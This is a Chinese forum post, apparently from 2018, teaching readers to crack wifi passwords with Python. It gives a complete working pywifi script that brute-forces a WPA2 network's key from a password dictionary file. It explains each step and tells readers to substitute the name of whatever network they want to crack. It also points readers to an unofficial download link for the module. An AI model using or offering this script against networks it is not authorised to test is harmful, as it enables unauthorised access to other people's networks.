搜索
查看: 5345|回复: 0

分分钟搞定python破解无线wifi

[复制链接]

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2018-3-27 10:50:21 | 显示全部楼层 |阅读模式 来自 甘肃
[size=0.32]代码我进行了大量精简,这样更能让大家看懂,有些功能我们以后在讲,这里我们只针对破解密码。
[size=0.32]既然要破解WiFi,那么连接wifi的模块首先要有的,我们要导入pywifi模块。
有些同学可能没有这个,如果直接通过pip安装的话,可能不能用,听说这个wifi模块被停用了,所以大家如果通过pip安装的不行,那么就下载我提供的。
链接:http://pan.baidu.com/s/1qXZSbEW 密码:m8wm
如果模块出现问题,请看评论里面的更新
[size=0.32]本地安装方法:
1)下载解压好以后,我们用cmd命令行,进入到你的文件目录,
2)使用命令pip install . 注意了(install后面有个点)
3)然后就会安装了,等一会就可以了。
[size=0.32]这是我安装的,可以参考下:

pywifi-master文件夹,我是放在c盘根目录下的,所以首先进入根目录,然后在进入pywifi-master文件夹,再输入命令pip install . 就行了
大家可以根据自己放的文职进行输入命令
[size=0.32]既然大家已经准备好了,那就开始了:
首先贴出代码,代码旁边有详细的注释,
先参考一下,我后面会讲述一下实现过程:
  1. # coding:utf-8
  2. import time  #时间
  3. import pywifi  #破解wifi
  4. from pywifi import const  #引用一些定义
  5. from asyncio.tasks import sleep
  6. class PoJie():
  7.     def __init__(self,path):
  8.         self.file=open(path,"r",errors="ignore")
  9.         wifi = pywifi.PyWiFi() #抓取网卡接口
  10.         self.iface = wifi.interfaces()[0]#抓取第一个无限网卡
  11.         self.iface.disconnect() #测试链接断开所有链接

  12.         time.sleep(1) #休眠1秒

  13.         #测试网卡是否属于断开状态,
  14.         assert self.iface.status() in\
  15.             [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]

  16.     def readPassWord(self):
  17.             print("开始破解:")
  18.             while True:

  19.                 try:
  20.                     myStr =self.file.readline()
  21.                     if not myStr:
  22.                         break
  23.                     bool1=self.test_connect(myStr)
  24.                     if bool1:
  25.                         print("密码正确:",myStr)
  26.                         break
  27.                     else:
  28.                         print("密码错误:"+myStr)
  29.                     sleep(3)
  30.                 except:
  31.                     continue

  32.     def test_connect(self,findStr):#测试链接

  33.         profile = pywifi.Profile()  #创建wifi链接文件
  34.         profile.ssid ="e2" #wifi名称
  35.         profile.auth = const.AUTH_ALG_OPEN  #网卡的开放,
  36.         profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法
  37.         profile.cipher = const.CIPHER_TYPE_CCMP    #加密单元
  38.         profile.key = findStr #密码

  39.         self.iface.remove_all_network_profiles() #删除所有的wifi文件
  40.         tmp_profile = self.iface.add_network_profile(profile)#设定新的链接文件
  41.         self.iface.connect(tmp_profile)#链接
  42.         time.sleep(5)
  43.         if self.iface.status() == const.IFACE_CONNECTED:  #判断是否连接上
  44.             isOK=True   
  45.         else:
  46.             isOK=False
  47.         self.iface.disconnect() #断开
  48.         time.sleep(1)
  49.         #检查断开状态
  50.         assert self.iface.status() in\
  51.             [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]

  52.         return isOK


  53.     def __del__(self):
  54.         self.file.close()

  55. path=r"C:\Users\Administrator\Desktop\csdnwifi.txt"
  56. start=PoJie(path)
  57. start.readPassWord()
复制代码
[size=0.32]下面讲解一下实现过程:
[size=0.32]1)首先导入pywifi模块,因为要启用wifi那么必须要有启用wifi的模块。
[size=0.32]2)有了启用wifi的模块以后,我们首先要抓取网卡接口,
因为连接无线wifi,必须要有网卡才行。一台电脑可能有很多网卡,
但是一般都只有一个wifi网卡,我们使用第一个网卡就行了。
[size=0.32]3)抓取到以后就进行连接测试,首选是要断开所有的wifi网卡上
的已连接成功的,因为有可能wifi上有连接成功的在。
[size=0.32]4)断开所有的wifi以后,我们就可以进行破解了,
从(.txt)文档中一行一行读取我们的密码字典,
一遍一遍的刷密码,直到返回isOK为True,表示破解成功。
[size=0.32]5)因为连接也是要时间的,不可能一秒钟尝试好多次,
所以我们设置了睡眠sleep.
[size=0.32]大家可能还有疑问,那就是test_connect这个方法中的代码,
[size=0.32]1) profile.ssid =”e2”表示你要破解的wifi的ssid也就是wifi名称,
我手机开了热点,热点名字是e2所以我写了e2,
大家可以自己更该要破解的名称
[size=0.32]2) profile.key就是要输入的密码
[size=0.32]
[size=0.32]3) 别的代码差不多就是固定写法了,还有加密算法可以更改,
这里就不进行具体讲解了,本篇主要让大家简单学会破解。
[size=0.32]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表